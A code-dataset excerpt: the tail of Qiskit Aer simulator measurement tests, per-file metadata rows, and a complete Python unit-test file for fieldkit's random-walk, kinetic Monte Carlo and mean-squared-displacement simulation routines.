experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_deterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_nondeterministic_multi_qubit_with_sampling(self): """Test QasmSimulator measure with non-deterministic counts""" shots = 2000 qobj = ref_measure.measure_circuits_qobj_nondeterministic( allow_sampling=True) qobj.config.shots = shots circuits = [experiment.header.name for experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_nondeterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots) def test_measure_nondeterministic_multi_qubit_without_sampling(self): """Test QasmSimulator measure with non-deterministic counts""" shots = 2000 qobj = ref_measure.measure_circuits_qobj_nondeterministic( allow_sampling=False) qobj.config.shots = shots circuits = [experiment.header.name for experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_nondeterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots)
46.795455
95
0.677837
677
6,177
5.980798
0.163959
0.059274
0.067177
0.057298
0.836503
0.829094
0.822425
0.793776
0.754754
0.754754
0
0.011371
0.202687
6,177
131
96
47.152672
0.810761
0.228914
0
0.844444
0
0
0
0
0
0
0
0
0
1
0.088889
false
0
0.033333
0
0.155556
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
908ee2ac26023dac6aa93c281a873f9f20227ae6
29,230
py
Python
fieldkit/test/test_simulate.py
mphoward/fieldkit
c45e32129979f23ce0441109bc03e2cb5aad1411
[ "BSD-3-Clause" ]
null
null
null
fieldkit/test/test_simulate.py
mphoward/fieldkit
c45e32129979f23ce0441109bc03e2cb5aad1411
[ "BSD-3-Clause" ]
3
2020-04-25T21:39:48.000Z
2020-12-14T23:12:14.000Z
fieldkit/test/test_simulate.py
mphoward/fieldkit
c45e32129979f23ce0441109bc03e2cb5aad1411
[ "BSD-3-Clause" ]
1
2020-03-17T22:00:42.000Z
2020-03-17T22:00:42.000Z
""" Unit tests for fieldkit.simulate """ import unittest import numpy as np import fieldkit class RandomWalkTest(unittest.TestCase): """ Test cases for :py:class:`~fieldkit.simulate.random_walk` """ def test_one_step(self): """ Test simple random walk rules for one step. """ mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) field[:,:,0] = 0 domain = fieldkit.domain.digitize(field, threshold=0.5) traj,x,im = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=10, seed=42) # check shape of output is OK self.assertEqual(traj.shape, (10,2,3)) self.assertEqual(x.shape, (2,3)) self.assertEqual(im.shape, (2,3)) # check that all coords are still in box self.assertTrue(np.all(x >= 0)) self.assertTrue(np.all(x < 3)) # walk cannot enter z = 0 self.assertTrue(np.all(traj[:,:,2] != 0)) # with 10 steps, a particle cannot have traveled more than 3 images self.assertTrue(np.all(im >= -3)) self.assertTrue(np.all(im < 3)) # check that trajectory is continuous (no step is larger than 1) # 0->1 self.assertLessEqual(np.max(traj[1]-traj[0]), 1) self.assertGreaterEqual(np.min(traj[1]-traj[0]), -1) # 1->2 self.assertLessEqual(np.max(traj[2]-traj[1]), 1) self.assertGreaterEqual(np.min(traj[2]-traj[1]), -1) # 2->3 self.assertLessEqual(np.max(traj[3]-traj[2]), 1) self.assertGreaterEqual(np.min(traj[3]-traj[2]), -1) # try to restart from last state traj2,_,_ = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=1, coords=x, images=im, seed=24) # first frame should match old coordinates np.testing.assert_array_equal(traj2[0], x + im*mesh.shape) # difference between last old and first new should be 1 step at most self.assertLessEqual(np.max(traj2[0]-traj[-1]), 1) self.assertGreaterEqual(np.min(traj2[0]-traj[-1]), -1) def test_msd(self): """ Validate random walk with a short simulation, computing the MSD. The simulation is constructed so that the MSD = 1 for each component after 1 run. 
""" mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) domain = fieldkit.domain.digitize(field, threshold=0.5) # displacement should be consistent with random walk traj,_,_ = fieldkit.simulate.random_walk(domain, N=4000, steps=3, runs=1000, seed=42) window = 3 msd = np.zeros((window+1,3)) samples = np.zeros(window+1, dtype=np.int32) for i,ri in enumerate(traj[:-1]): for dt in range(1,min(window+1,traj.shape[0]-i)): rj = traj[i+dt] dr = rj-ri msd[dt] += np.mean(dr*dr,axis=0) samples[dt] += 1 flags = samples > 0 for ax in range(3): msd[flags,ax] /= samples[flags] np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2) # use compiled code to test farther out msd_2 = fieldkit.simulate.msd(traj,window=window) self.assertEqual(msd_2.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_2[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_2[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd_2[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_2[3], (3.,3.,3.), decimal=2) # both results should be essentially the same np.testing.assert_array_almost_equal(msd,msd_2) # use every 2nd origin with a looser tolerance due to lower stats msd_3 = fieldkit.simulate.msd(traj,window=window,every=2) self.assertEqual(msd_3.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_3[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_3[1], (1.,1.,1.), decimal=2) np.testing.assert_array_almost_equal(msd_3[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_3[3], (3.,3.,3.), decimal=2) def test_msd_binned(self): """ Test binned MSD compared to bulk MSD calculator. 
The simulation is constructed so that the MSD = 1 for each component after 1 run. """ # dummy trajectory traj = np.zeros((4,3,3)) traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]] traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]] traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]] traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]] # msd from binned msd_bin,edges = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,3)) self.assertEqual(edges.shape, (9,)) np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0)) # only bins 0, 4, and 7 have particles contributing np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.))) # repeat using every other origin, should give identical result msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2), every=2) self.assertEqual(msd_bin.shape, (8,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) 
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.))) # compute with a range that no particles lie in, should give all zeros msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1)) self.assertEqual(msd_bin.shape, (1,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(0.,0.,0.))) # repeat for the window that only the first particle lies in msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=3, range=(0,0.6)) self.assertEqual(msd_bin.shape, (3,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) # roll the trajectory so binning is done along y traj = np.roll(traj, shift=1, axis=2) msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=1, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(9.,1.e-2,1.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.,1.e-2,4.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.e-2,1.))) # roll again so binning is done along z traj = np.roll(traj, shift=1, axis=2) msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=2, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.,9.,1.e-2))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], 
((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(4.,1.,1.e-2))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.,1.e-2))) def test_msd_survival(self): """ Test binned MSD compared to bulk MSD calculator. The simulation is constructed so that the MSD = 1 for each component after 1 run. """ # dummy trajectory traj = np.zeros((4,3,3)) traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]] traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]] traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]] traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]] # msd from binned msd_bin,counts,edges = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,2)) self.assertEqual(counts.shape, (8,2)) self.assertEqual(edges.shape, (9,)) np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0)) # check counts np.testing.assert_array_equal(counts[0], (3,3)) np.testing.assert_array_equal(counts[1], (0,0)) np.testing.assert_array_equal(counts[2], (0,0)) np.testing.assert_array_equal(counts[3], (0,0)) np.testing.assert_array_equal(counts[4], (3,3)) np.testing.assert_array_equal(counts[5], (0,0)) np.testing.assert_array_equal(counts[6], (0,0)) np.testing.assert_array_equal(counts[7], (3,3)) # only bins 0, 4, and 7 have particles contributing np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) 
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # repeat using every other origin, should give identical result msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2), every=2) self.assertEqual(msd_bin.shape, (8,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # compute with a range that no particles lie in, should give all zeros msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1)) self.assertEqual(msd_bin.shape, (1,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(0.,0.))) # roll the trajectory so binning is done along y traj = np.roll(traj, shift=1, axis=2) msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=1, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(9.,1.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(1.,4.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # roll again so binning is done along z traj = np.roll(traj, shift=1, 
axis=2) msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=2, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # TODO: test when a particle exits the bin def test_msd_survival_cylinder(self): """ Test radially binned MSD.""" # dummy radial and axial coordinates r = np.zeros((4,3)) r[0,:] = [0.0,1.5,2.5] r[1,:] = [0.3,1.3,2.5] r[2,:] = [0.6,1.1,2.5] r[3,:] = [0.9,1.01,2.5] # 0 has D = 1, 1 has D = 2, 2 has D = 3 z = np.zeros((4,3)) z[0,:] = [1,-2,0] z[1,:] = [2,-4,3] z[2,:] = [3,-6,6] z[3,:] = [4,-8,9] # msd from binned msd_bin,counts,edges = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, range=(0,4)) self.assertEqual(msd_bin.shape, (4,2)) self.assertEqual(counts.shape, (4,2)) self.assertEqual(edges.shape, (5,)) np.testing.assert_array_almost_equal(edges,(0,1,2,3,4)) # check counts np.testing.assert_array_equal(counts[0], (3,3)) np.testing.assert_array_equal(counts[1], (3,3)) np.testing.assert_array_equal(counts[2], (3,3)) np.testing.assert_array_equal(counts[3], (0,0)) # only bins 0, 1, and 2 have particles contributing np.testing.assert_array_almost_equal(msd_bin[0], (0,1)) np.testing.assert_array_almost_equal(msd_bin[1], (0,4)) np.testing.assert_array_almost_equal(msd_bin[2], (0,9)) np.testing.assert_array_almost_equal(msd_bin[3], (0,0)) # repeat using every other origin, should give identical result msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, 
range=(0,4), every=2) self.assertEqual(msd_bin.shape, (4,2)) np.testing.assert_array_almost_equal(msd_bin[0], (0,1)) np.testing.assert_array_almost_equal(msd_bin[1], (0,4)) np.testing.assert_array_almost_equal(msd_bin[2], (0,9)) np.testing.assert_array_almost_equal(msd_bin[3], (0,0)) # shring range to lose inner and outer particle msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=2, range=(1,3)) self.assertEqual(msd_bin.shape, (2,2)) np.testing.assert_array_almost_equal(msd_bin[0], (0,4)) np.testing.assert_array_almost_equal(msd_bin[1], (0,9)) class BiasedRandomWalkTest(unittest.TestCase): """ Test cases for :py:class:`~fieldkit.simulate.biased_walk` """ def test_one_step(self): """ Test biased random walk rules for one step, using unbiased rates. """ mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) field[:,:,0] = 0 domain = fieldkit.domain.digitize(field, threshold=0.5) # these are the hopping rates. # should really be zero to go in boundary, but this move will be rejected anyway. probs = np.full(list(mesh.shape) + [6], 1./6.) 
traj,x,im = fieldkit.simulate.biased_walk(domain, probs, N=2, steps=1, runs=10, seed=42) # check shape of output is OK self.assertEqual(traj.shape, (10,2,3)) self.assertEqual(x.shape, (2,3)) self.assertEqual(im.shape, (2,3)) # check that all coords are still in box self.assertTrue(np.all(x >= 0)) self.assertTrue(np.all(x < 3)) # walk cannot enter z = 0 self.assertTrue(np.all(traj[:,:,2] != 0)) # with 10 steps, a particle cannot have traveled more than 3 images self.assertTrue(np.all(im >= -3)) self.assertTrue(np.all(im < 3)) # check that trajectory is continuous (no step is larger than 1) # 0->1 self.assertLessEqual(np.max(traj[1]-traj[0]), 1) self.assertGreaterEqual(np.min(traj[1]-traj[0]), -1) # 1->2 self.assertLessEqual(np.max(traj[2]-traj[1]), 1) self.assertGreaterEqual(np.min(traj[2]-traj[1]), -1) # 2->3 self.assertLessEqual(np.max(traj[3]-traj[2]), 1) self.assertGreaterEqual(np.min(traj[3]-traj[2]), -1) # try to restart from last state traj2,_,_ = fieldkit.simulate.biased_walk(domain, probs, N=2, steps=1, runs=1, coords=x, images=im, seed=24) # first frame should match old coordinates np.testing.assert_array_equal(traj2[0], x + im*mesh.shape) # difference between last old and first new should be 1 step at most self.assertLessEqual(np.max(traj2[0]-traj[-1]), 1) self.assertGreaterEqual(np.min(traj2[0]-traj[-1]), -1) def test_msd(self): """ Validate biased random walk with a short simulation, computing the MSD. The simulation is constructed so that the MSD = 1 for each component after 1 run. """ mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) domain = fieldkit.domain.digitize(field, threshold=0.5) # these are the hopping rates, which we make a random walk for now probs = np.full(list(mesh.shape) + [6], 1./6.) 
# displacement should be consistent with random walk traj,_,_ = fieldkit.simulate.biased_walk(domain, probs, N=4000, steps=3, runs=1000, seed=42) window = 3 msd = np.zeros((window+1,3)) samples = np.zeros(window+1, dtype=np.int32) for i,ri in enumerate(traj[:-1]): for dt in range(1,min(window+1,traj.shape[0]-i)): rj = traj[i+dt] dr = rj-ri msd[dt] += np.mean(dr*dr,axis=0) samples[dt] += 1 flags = samples > 0 for ax in range(3): msd[flags,ax] /= samples[flags] np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2) # use compiled code to test farther out msd_2 = fieldkit.simulate.msd(traj,window=window) self.assertEqual(msd_2.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_2[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_2[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd_2[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_2[3], (3.,3.,3.), decimal=2) # both results should be essentially the same np.testing.assert_array_almost_equal(msd,msd_2) # use every 2nd origin with a looser tolerance due to lower stats msd_3 = fieldkit.simulate.msd(traj,window=window,every=2) self.assertEqual(msd_3.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_3[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_3[1], (1.,1.,1.), decimal=2) np.testing.assert_array_almost_equal(msd_3[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_3[3], (3.,3.,3.), decimal=2) class kmcTest(unittest.TestCase): """ Test cases for :py:class:`~fieldkit.simulate.kmc`""" def test_basic(self): """ Test basic biased random walk rules, using unbiased rates.""" mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0)) field = 
fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) field[:,:,0] = 0 domain = fieldkit.domain.digitize(field, threshold=0.5) # these are the hopping rates. # should really be zero to go in boundary, but this move will be rejected anyway. rates = np.full(list(mesh.shape) + [6], 1.) traj,x,im,t = fieldkit.simulate.kmc(domain, rates, np.arange(10), N=2, steps=100, seed=42) # check shape of output is OK self.assertEqual(traj.shape, (10,2,3)) self.assertEqual(x.shape, (2,3)) self.assertEqual(im.shape, (2,3)) self.assertEqual(t.shape, (2,)) # check that all coords are still in box self.assertTrue(np.all(x >= 0)) self.assertTrue(np.all(x < 3)) # walk cannot enter z = 0 self.assertTrue(np.all(traj[:,:,2] != 0)) # with 10 steps, a particle cannot have traveled more than 3 images self.assertTrue(np.all(im >= -3)) self.assertTrue(np.all(im < 3)) def test_msd(self): """ Validate biased random walk with a short simulation, computing the MSD. This MSD is a little different than the usual random walk because the MSD tends to 1.0 at t->0, rather than 0.0, because any hop (even after a short time) moves the walker by one lattice site. """ mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) domain = fieldkit.domain.digitize(field, threshold=0.5) # displacement should be consistent with random walk with coeff. 
1/2 rates = np.full(list(mesh.shape) + [6], 0.5) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, np.arange(2000), N=4000, steps=10000, seed=42) window = 3 msd = fieldkit.simulate.msd(traj,window=window) self.assertEqual(msd.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2) def test_rates(self): """Test hopping rate calculator.""" mesh = fieldkit.Mesh().from_lattice(N=12, lattice=fieldkit.HOOMDLattice(L=12.0)) ## bias D in z flags = np.logical_or(mesh.grid[...,2] < 1.0, mesh.grid[...,2] > 10) D = fieldkit.Field(mesh).from_array(0.1*(11.0-mesh.grid[...,2])) D[flags] = 0. rho = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) rho[flags] = 0. domain = fieldkit.domain.digitize(rho, threshold=1.e-6) # check rates by hand for simple case rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) self.assertEqual(rates.shape, (12,12,12,6)) np.testing.assert_array_almost_equal(rates[0,0,0], (0.,0.,0.,0.,0.,0.)) np.testing.assert_array_almost_equal(rates[0,0,1], (1.,1.,1.,1.,0.95,0.)) np.testing.assert_array_almost_equal(rates[0,0,2], (0.9,0.9,0.9,0.9,0.85,0.95)) # ... 
np.testing.assert_array_almost_equal(rates[0,0,9], (0.2,0.2,0.2,0.2,0.15,0.25)) np.testing.assert_array_almost_equal(rates[0,0,10], (0.1,0.1,0.1,0.1,0.,0.15)) np.testing.assert_array_almost_equal(rates[0,0,11], (0.,0.,0.,0.,0.,0.)) np.testing.assert_array_almost_equal(rates[0,0], rates[1,0]) np.testing.assert_array_almost_equal(rates[0,0], rates[0,1]) # run short simulation to verify density distribution traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,2]), 1) self.assertEqual(np.max(traj[...,2]), 10) hist,_ = np.histogram(traj[...,2], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, 0.1, decimal=2) ## also bias the density in z rho.field = 0.1*(mesh.grid[...,2]) rho[flags] = 0. domain = fieldkit.domain.digitize(rho, threshold=1.e-6) rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) np.testing.assert_array_almost_equal(rates[0,0,0,0:4], 0.) np.testing.assert_array_almost_equal(rates[0,0,1,0:4], 1.) np.testing.assert_array_almost_equal(rates[0,0,10,0:4], 0.1) np.testing.assert_array_almost_equal(rates[0,0,11,0:4], 0.) np.testing.assert_array_almost_equal(rates[0,0], rates[1,0]) np.testing.assert_array_almost_equal(rates[0,0], rates[0,1]) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,2]), 1) self.assertEqual(np.max(traj[...,2]), 10) hist,_ = np.histogram(traj[...,2], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, rho.field[0,0,1:-1]/np.sum(rho.field[0,0,1:-1]), decimal=2) ## roll axis to y D.field = np.moveaxis(D.field,2,1) rho.field = np.moveaxis(rho.field,2,1) domain = fieldkit.domain.digitize(rho, threshold=1.e-6) rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) np.testing.assert_array_almost_equal(rates[0,0,0,0:2], 0.) np.testing.assert_array_almost_equal(rates[0,0,0,4:6], 0.) 
np.testing.assert_array_almost_equal(rates[0,1,0,0:2], 1.) np.testing.assert_array_almost_equal(rates[0,1,0,4:6], 1.) np.testing.assert_array_almost_equal(rates[0,10,0,0:2], 0.1) np.testing.assert_array_almost_equal(rates[0,10,0,4:6], 0.1) np.testing.assert_array_almost_equal(rates[0,11,0,0:2], 0.) np.testing.assert_array_almost_equal(rates[0,11,0,4:6], 0.) np.testing.assert_array_almost_equal(rates[0,:,0], rates[1,:,0]) np.testing.assert_array_almost_equal(rates[0,:,0], rates[0,:,1]) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,1]), 1) self.assertEqual(np.max(traj[...,1]), 10) hist,_ = np.histogram(traj[...,1], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, rho.field[0,1:-1,0]/np.sum(rho.field[0,1:-1,0]), decimal=2) ## roll axis to z D.field = np.moveaxis(D.field,1,0) rho.field = np.moveaxis(rho.field,1,0) domain = fieldkit.domain.digitize(rho, threshold=1.e-6) rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) np.testing.assert_array_almost_equal(rates[0,0,0,2:6], 0.) np.testing.assert_array_almost_equal(rates[1,0,0,2:6], 1.) np.testing.assert_array_almost_equal(rates[10,0,0,2:6], 0.1) np.testing.assert_array_almost_equal(rates[11,0,0,2:6], 0.) np.testing.assert_array_almost_equal(rates[:,0,0], rates[:,1,0]) np.testing.assert_array_almost_equal(rates[:,0,0], rates[:,0,1]) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,0]), 1) self.assertEqual(np.max(traj[...,0]), 10) hist,_ = np.histogram(traj[...,0], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, rho.field[1:-1,0,0]/np.sum(rho.field[1:-1,0,0]), decimal=2)
51.461268
116
0.614232
4,812
29,230
3.583957
0.057564
0.03769
0.033225
0.18555
0.932796
0.915111
0.898237
0.878986
0.866462
0.837528
0
0.073767
0.199521
29,230
567
117
51.552028
0.663305
0.139104
0
0.670185
0
0
0
0
0
0
0
0.001764
0.617414
1
0.026385
false
0
0.007916
0
0.042216
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
8
90de5855392a7a0246dd03346befb0707c52b316
367,673
py
Python
